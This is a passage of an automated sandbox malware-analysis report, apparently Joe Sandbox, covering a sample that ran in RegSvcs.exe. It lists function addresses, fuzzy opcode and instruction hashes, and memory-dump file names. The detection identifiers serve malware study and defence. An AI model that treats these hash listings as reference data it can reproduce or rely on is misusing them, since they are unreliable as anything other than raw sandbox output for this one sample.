Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e32b1ee9730e06ce47f70030becaf2d6c7d9b79f5661884c48aa7a1da90a77
Instruction ID: b820215d27140afffdd51c080c942f378a5e17969f25e361647effd82a5111f5
Opcode Fuzzy Hash: a4e32b1ee9730e06ce47f70030becaf2d6c7d9b79f5661884c48aa7a1da90a77
Instruction Fuzzy Hash: 6D31B972D00219AFDB31DFA9CD45AAEB7F9FF44750F014469E516EB260D7709E008BA1

Function 015D07AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 505035d8554e2a68129257addf4bf9f02dfe7f4a432b6b385260c14553018593
Instruction ID: f32db1477d8912647f0b41c3a4e9f5e870e41912c01cf73e8c82088d62d46dc5
Opcode Fuzzy Hash: 505035d8554e2a68129257addf4bf9f02dfe7f4a432b6b385260c14553018593
Instruction Fuzzy Hash: 6931C232A04612DBC722DE6C8895A6BBBE5FFD4650F01492DFD5AAF350DA30DC1187E1

Function 0164CA72 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e56801aba27c2ae1c6319a93f920da4ac03f74dda034b0a4d323a89f351e9a7
Instruction ID: 5e8b081b6f9654cfd4e1e9613fb3d6e62e1d6857e2b019a6896852ac10a3480a
Opcode Fuzzy Hash: 1e56801aba27c2ae1c6319a93f920da4ac03f74dda034b0a4d323a89f351e9a7
Instruction Fuzzy Hash: F731313690251AAFEB16CA59CC54EAFBBB4FF80720F014069E905AB350D7309E00DBE0

Function 0160A6C7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e136c029909a3ccf1237e4fc7d16277c3fe1d3b2d70fb0f0b3587283bfba0b1c
Instruction ID: 6c0a173d4f1b965d27fb15935956f140672cbe1029eded565c930e9ab3fd0486
Opcode Fuzzy Hash: e136c029909a3ccf1237e4fc7d16277c3fe1d3b2d70fb0f0b3587283bfba0b1c
Instruction Fuzzy Hash: 91312E76B00701AFE765CF6DCD40B67BBF8BB48690F14452DA59AC3790E730E9008B64

Function 015F438F Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc767ddd4d974175118e855ec10befe1530889d557a827acab0cd3e0bd2070ae
Instruction ID: c1076b120d34f886516aaae4903d6c988ffd4f068789992fa67b1fd30c5ba48b
Opcode Fuzzy Hash: fc767ddd4d974175118e855ec10befe1530889d557a827acab0cd3e0bd2070ae
Instruction Fuzzy Hash: F331C232B002069FD724EFA8CD84A6FBBF9BB84304F00852DD206EB655D730D945CBA0

Function 015CCB7E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7790bd36a42e865f7c718a67dc22d3f79e787f24dbf99b6834416aa25bbd7ff7
Instruction ID: 0a26777fd4a95b164984ef6f1f20bc57dfbb276c34748dba2a614f1287ad97e2
Opcode Fuzzy Hash: 7790bd36a42e865f7c718a67dc22d3f79e787f24dbf99b6834416aa25bbd7ff7
Instruction Fuzzy Hash: 8121F936E00667AEDB109FF9C840BAFBBB5BF54740F058475DA55EB340E270C9008B90

Function 015CE420 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 124d7468bb36a81e7eadb25ac59746cf584e0d5804012721233b0ac9cb48a34e
Instruction ID: 7586ac8015c7390682f2db2b6224cea29d5fff26a6e231aedafd17903954733b
Opcode Fuzzy Hash: 124d7468bb36a81e7eadb25ac59746cf584e0d5804012721233b0ac9cb48a34e
Instruction Fuzzy Hash: DA31C431A011299FDB35DF58CC82FEEBBB9FB55B40F0104A9E645AB290D6749E808F90

Function 01604588 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277169c50a7bdf1e1def58b38a3c1dedac02a8c9ac2be01cc5a137e0a7ffea9f
Instruction ID: 81b29f519bcf06bb51a93d5d660a8a5824465243e58e88ef6f2daa6cbf9e6ee0
Opcode Fuzzy Hash: 277169c50a7bdf1e1def58b38a3c1dedac02a8c9ac2be01cc5a137e0a7ffea9f
Instruction Fuzzy Hash: 14216535A00615EBCB26CF98CD80A9BBBA5FF48714F108169EE159B281EA71DA05CB50

Function 016044B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b1b7e464ea993f89139c58c9a7d0380d8f1a7b83518f0317aead30f822a588
Instruction ID: 00a2fe16b1ebc2eadcbc9f67c2788043fda7ccb867cfbfe36af5a8fc172f3400
Opcode Fuzzy Hash: a1b1b7e464ea993f89139c58c9a7d0380d8f1a7b83518f0317aead30f822a588
Instruction Fuzzy Hash: F321B1726087469BC727DF18DC80B6B77E5FB88760F014619FA589B781DB31E901CBA2

Function 015CE388 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44134b3cc04c3b9165643a468610c299cbef36331bc2ea93ac49eb48e3b8bc4a
Instruction ID: b17513faaebb69e58d343b7f6a4607260e77bbc18a588f43feb00d94f482ce34
Opcode Fuzzy Hash: 44134b3cc04c3b9165643a468610c299cbef36331bc2ea93ac49eb48e3b8bc4a
Instruction Fuzzy Hash: 4A31AB31600605EFD721CFA8C985F6ABBF9FF85754F1049A9E5128B280E770EE01CB50

Function 0164E609 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ee0c9a6845e2d549a38b916f5b4fcf0b871abe1bd1ad0140e04936084a672e
Instruction ID: c55e9561aea387f7dd66ee68c5188e42d7da5c2cafd0e33adace2680b8cac726
Opcode Fuzzy Hash: 03ee0c9a6845e2d549a38b916f5b4fcf0b871abe1bd1ad0140e04936084a672e
Instruction Fuzzy Hash: 3931A075A00215DFCB14CF1CCC849AEB7B6FF88304F15445AE8099B391E776EA51CB94

Function 015F8CB1 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be42928480fe83a6920f429437d80c1551646c43924c5eabe80f3f6a5d3481a8
Instruction ID: 2c8d6fcc3bb42b7a006b2a2e1a7e501543ff30593ec073f035550f5ff51ae432
Opcode Fuzzy Hash: be42928480fe83a6920f429437d80c1551646c43924c5eabe80f3f6a5d3481a8
Instruction Fuzzy Hash: 98212637A00115ABDB229A9DCC44F5FBBFDBFA1AA0F05452ABB05DF254C630DD0187A0

Function 015D8D59 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
Instruction ID: 6b77f7f55e3dff33dc47d90f1ad55b2b6b0c3fcc34f53e6bc7c063905b3e5103
Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
Instruction Fuzzy Hash: F621D831A02646DBE726A72CDD25B2577F4BF90750F1904A8DD428B7D3E765DC41C250

Function 016506F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b492e9f01dcc9363873f8f600097e6f9197a40bf0e08c1e6f8b0d6cc899dd4
Instruction ID: 3c634c895fc9535a9d223dd5035bb46fc198904fd8819106e8431b0c955fc133
Opcode Fuzzy Hash: c5b492e9f01dcc9363873f8f600097e6f9197a40bf0e08c1e6f8b0d6cc899dd4
Instruction Fuzzy Hash: 5E21807190062A9BCF14DF59CC81ABEB7F8FF48740F540069F941AB254E778AD51CBA0

Function 0165019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279eec9a92621ad5bfb41a189c5be3626a6db70f600aea01e05884d482eed149
Instruction ID: 9d315e4aae4d3147c6a6a63bb40a933b6792fdec4d8b3a06a467160e4d5eaf01
Opcode Fuzzy Hash: 279eec9a92621ad5bfb41a189c5be3626a6db70f600aea01e05884d482eed149
Instruction Fuzzy Hash: 3A218B72A00645AFD715DBACCD44A6AB7E8FF88780F1440A9F905DB7A0D734ED50CB68

Function 01650283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23cc667db8c5545dec7d97c8bab56a06b1e7f0b2ea58af1c84f01a2cb68586a1
Instruction ID: a653d020c410d284bbad720ebb2a93acc4426bd9dcca4856a93b569658e0ad1d
Opcode Fuzzy Hash: 23cc667db8c5545dec7d97c8bab56a06b1e7f0b2ea58af1c84f01a2cb68586a1
Instruction Fuzzy Hash: 7821AF729042469BD721EF69DD48F5BBBECBF90380F08445ABE848B252D734D905C6A2

Function 015F2835 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c302ecfb5f9be0c298b1780b8ca1e9a226f886195cadaacb05069c8a9929d2fa
Instruction ID: 37a825b83ae2691a4f19cc7f45de57de4c2dd02b04d09df652dd2ce2c6d3efee
Opcode Fuzzy Hash: c302ecfb5f9be0c298b1780b8ca1e9a226f886195cadaacb05069c8a9929d2fa
Instruction Fuzzy Hash: 52210B72A057869BE326576CCD18B243BD5BF81774F2807A8FB60DF7E2DB68C8018250

Function 015D6C50 Relevance: .1, Instructions: 73timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015D6D8C

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
Instruction ID: 2d89655aaaa2f73eabbdaebc5f2d7413c1e2fb53364b9407172734fe34b7528b
Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
Instruction Fuzzy Hash: D4316875A01601CFC721CF5DC590B26BBE9FB89714F2484ADE9498B752DB31E942CB90

Function 0160A30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4f733223161a270ee6e1c7e44000d3cec7dc04836485ad9e123deb3de6ca61
Instruction ID: d1d0558ab87dc88deadb67a99fdac02114e7c9709aaf1fae353b305dc0e74dd2
Opcode Fuzzy Hash: 9c4f733223161a270ee6e1c7e44000d3cec7dc04836485ad9e123deb3de6ca61
Instruction Fuzzy Hash: 3F219879610B019FC729DF69CC00B56B7F5FF48B44F2484A8A50ACBB61E331E842CB98

Function 01650946 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 690f6d4dca6acb2cacc9f84d79411bd1ab1a82dd7412b7ebb5c88c76da89424b
Instruction ID: c59739b0e810e57cb18e398c6c4e638774ef0f02e65ce361e079987a94a19b38
Opcode Fuzzy Hash: 690f6d4dca6acb2cacc9f84d79411bd1ab1a82dd7412b7ebb5c88c76da89424b
